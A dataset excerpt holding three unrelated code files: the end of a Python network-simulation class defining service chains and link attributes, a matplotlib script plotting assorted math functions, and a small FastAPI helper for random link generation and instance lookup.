sfc('sfc24','node8','node17',['type3', 'type6', 'type1', 'type8'],0.3,9,0,0,self.vnf_types),\
sfc('sfc25','node4','node18',['type4', 'type1', 'type7'],0.5,10,0,0,self.vnf_types),\
sfc('sfc26','node14','node19',['type8', 'type6', 'type2', 'type3', 'type1'],0.2,7,0,0,self.vnf_types),\
sfc('sfc27','node17','node12',['type3', 'type4', 'type8'],0.2,7,0,0,self.vnf_types),\
sfc('sfc28','node15','node3',['type8', 'type3', 'type7', 'type5'],0.2,8,0,0,self.vnf_types),\
sfc('sfc29','node21','node14',['type5', 'type3', 'type6', 'type8'],0.5,5,0,0,self.vnf_types),\
sfc('sfc30','node4','node20',['type3', 'type4', 'type1', 'type5'],0.2,9,0,0,self.vnf_types),\
#eMBB
sfc('sfc41','node15','node14',['type8', 'type3', 'type6', 'type2', 'type5'],3.2,6,0,0,self.vnf_types),\
sfc('sfc42','node10','node7',['type7', 'type2', 'type8', 'type3', 'type5'],3.0,7,0,0,self.vnf_types),\
sfc('sfc43','node6','node8',['type5', 'type6', 'type1', 'type4'],3.8,8,0,0,self.vnf_types),\
sfc('sfc44','node21','node3',['type8', 'type6', 'type5', 'type2'],3.1,8,0,0,self.vnf_types),\
sfc('sfc45','node13','node15',['type2', 'type8', 'type4', 'type3', 'type7'],3.0,10,0,0,self.vnf_types),\
sfc('sfc46','node17','node13',['type4', 'type5', 'type1', 'type3'],3.9,7,0,0,self.vnf_types),\
])
self.figure=''
def generate_edges(self):
self.add_edges([[self.node1,self.node2,{'bandwidth':10}],[self.node2,self.node3,{'bandwidth':10}],\
[self.node3,self.node4,{'bandwidth':10}],[self.node3,self.node5,{'bandwidth':10}],\
[self.node5,self.node6,{'bandwidth':10}],[self.node5,self.node7,{'bandwidth':10}],\
[self.node5,self.node9,{'bandwidth':10}],[self.node5,self.node16,{'bandwidth':10}],\
[self.node6,self.node8,{'bandwidth':10}],[self.node7,self.node9,{'bandwidth':10}],\
[self.node8,self.node12,{'bandwidth':10}],[self.node9,self.node10,{'bandwidth':10}],\
[self.node10,self.node11,{'bandwidth':10}],[self.node12,self.node13,{'bandwidth':10}],\
[self.node12,self.node14,{'bandwidth':10}],[self.node13,self.node15,{'bandwidth':10}],\
[self.node14,self.node16,{'bandwidth':10}],[self.node15,self.node20,{'bandwidth':10}],\
[self.node16,self.node17,{'bandwidth':10}],[self.node16,self.node19,{'bandwidth':10}],\
[self.node16,self.node21,{'bandwidth':10}],[self.node17,self.node18,{'bandwidth':10}],[self.node20,self.node21,{'bandwidth':10}]])
def generate_nodes_atts(self,atts=[30, 29, 28, 27, 27, 27, 26, 22, 22, 20, 19, 17, 16, 16, 14, 14, 13, 13, 12, 11, 10]):
nodes=[5,16,21,3,12,13,10,1,2,4,6,7,8,9,11,14,15,17,18,19,20]
if len(atts)==len(nodes):
i=0
for node in nodes:
self.set_atts('node'+str(node),{'cpu':atts[i]})
i+=1
def generate_edges_atts(self,atts=[0.77, 0.59, 1.47, 0.95, 0.59, 0.69, 1.56, 1.1, 0.52, 1.03, 0.95, 1.08, 0.83, 1.21, 1.33, 0.92, 0.75, 1.34, 1.22, 1.29, 0.56, 0.64, 1.3]):
i=0
for edge in self.G.edges:
self.set_edge_atts(edge[0],edge[1],{'delay':atts[i]})
i+=1
def draw(self,figsize=[36,20],node_size=10000,node_fone_size=8,link_fone_size=9,node_shape='H',path=''):
network.draw(self,figsize=figsize,pos=cernnet2_layout(self.G),node_size=node_size,node_fone_size=node_fone_size,link_fone_size=link_fone_size,node_shape=node_shape)
def draw_dynamic(self,figsize=[36,20],path='',node_size=10000,node_fone_size=8,link_fone_size=9,node_shape='H'):
network.draw_dynamic(self,figsize=figsize,pos=cernnet2_layout(self.G),node_size=node_size,node_fone_size=node_fone_size,link_fone_size=link_fone_size,node_shape=node_shape)
``` |
{
"source": "154829221/deeplearning",
"score": 3
} |
#### File: deeplearning/math/functions.py
```python
import numpy as np
import matplotlib.pyplot as plt
import math
def draw(func,a,b):
plt.rcParams['font.family'] = 'SimHei'
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['axes.unicode_minus'] = False
plt.figure(2)
ax = plt.subplot(111)
x = np.linspace(a, b, 100000) # 在0到2pi之间,均匀产生200点的数组
y,name = func(x)
ax.plot(x,y)
ax.set_title(name)
ax.set_xlabel('X')
ax.set_ylabel('Y')
plt.ylim(ymin=-1000,ymax=1000000)
plt.show()
def drawAndCompare(f1,f2,a,b):
plt.rcParams['font.family'] = 'SimHei'
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['axes.unicode_minus'] = False
plt.figure(2)
ax = plt.subplot(111)
x = np.linspace(a, b, 100000) # 在0到2pi之间,均匀产生200点的数组
y1,name1 = f1(x)
y2,name2 = f2(x)
ax.plot(x,y1)
ax.plot(x,y2)
ax.set_title(" 蓝色:"+name1+" 橘色:"+name2)
ax.set_xlabel('X')
ax.set_ylabel('Y')
plt.ylim(ymin=-10000,ymax=1000000)
plt.show()
def drawAndCompare2(f1,f2,f3,a,b):
plt.rcParams['font.family'] = 'SimHei'
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['axes.unicode_minus'] = False
plt.figure(2)
ax = plt.subplot(111)
x = np.linspace(a, b, 10000000000000) # 在0到2pi之间,均匀产生200点的数组
y1,name1 = f1(x)
y2,name2 = f2(x)
y3,name3 = f3(x)
ax.plot(x,y1)
ax.plot(x,y2)
ax.plot(x,y3)
ax.set_title(" 蓝色:"+name1+" 橘色:"+name2+" 绿色:"+name3)
ax.set_xlabel('X')
ax.set_ylabel('Y')
plt.ylim(ymin=-0.5,ymax=5)
plt.show()
# x的三次方-3x
def func1(x):
y = np.power(x, 3) - 3 * x
name = "np.power(x, 3) - 3 * x"
return y,name
# x的三次方-3x
def func2(x):
y = np.sin(x)
name = "np.sin(x)"
return y,name
# x-(3/2)*np.power(x,2/3)
def func3(x):
#这里需要注意直接使用2/3次方的话,power函数无法正确处理。
y = x-(3/2)*newPow(np.power(x,2),3)
name = "x-(3/2)*np.power(x,2/3)"
return y,name
# 2*np.power(x,1/2)
def func4(x):
y = 2*np.power(x,1/2)
name = "2*np.power(x,1/2)"
return y,name
# 3-1/x
def func5(x):
#这里需要注意直接使用2/3次方的话,power函数无法正确处理。
y = 3-(1/x)
name = "3-1/x"
return y,name
# lnx
def func6(x):
#这里需要注意直接使用2/3次方的话,power函数无法正确处理。
y = np.log(x)
name = "lnx"
return y,name
# 1/x*sin(1/x)
def func8(x):
y =1/x*np.sin(1/x)
name = "1/x*sin(1/x)"
return y,name
# 1/x
def func9(x):
y =1/x
name = "1/x"
return y,name
# power(x,-1/2)
def func10(x):
y =np.power(x,-1/2)
name = "power(x,-1/2)"
return y,name
# 1/(x*x)
def func12(x):
y =1/np.power(x,2)
name = "1/np.power(x,2)"
return y,name
# 1/(x*x)
def func13(x):
y =1/np.power(x,1/2)
name = "1/np.power(x,1/2)"
return y,name
# 1/(x*(x-1)*(x+1)*(x-2))
def func11(x):
y =1/(x*(x-1)*(x+1)*(x-2))
name = "1/(x*(x-1)*(x+1)*(x-2))"
return y,name
# np.power(x,5)+4*np.power(x,4) +1
def func14(x):
y =0.8*np.power(x,5)+4*np.power(x,4) +1
name = "np.power(x,5)+4*np.power(x,4) +1"
return y,name
# np.power(x,5)
def func15(x):
y =np.power(x,5)
name = "np.power(x,5)"
return y,name
# np.power(x,10)/np.exp(x)
def func16(x):
y =np.power(x,10)/np.exp(x)
name = "np.power(x,10)/np.exp(x)"
return y,name
# y = np.power(x,1/3)
def newPow(x,n):
y = []
for i in list(x):
if i < 0:
y.append(-pow(-i,1/n))
else:
y.append(pow(i,1/n))
y1 = np.array(y)
return y1
# draw(func6,-2,3)
# draw(func2,-2,2)
# draw(func3,-2,2)
# drawAndCompare(func14,func15,-2,20000)
draw(func16,-10,150)
``` |
{
"source": "154King154/common-data-app",
"score": 3
} |
#### File: backend/logic/tools.py
```python
import string
import random
from fastapi import HTTPException
def random_string(length=5):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for _ in range(length))
async def generate_link(model):
counter = 5
link = random_string(counter)
while True:
if await model.get_or_none(link=link) is None:
break
counter += 1
link = random_string(counter)
return link
async def instance_getter(model, **params):
instance = await model.get_or_none(**params)
if instance is None:
raise HTTPException(404, f'{model.__name__} not found')
return instance
``` |
Subsets and Splits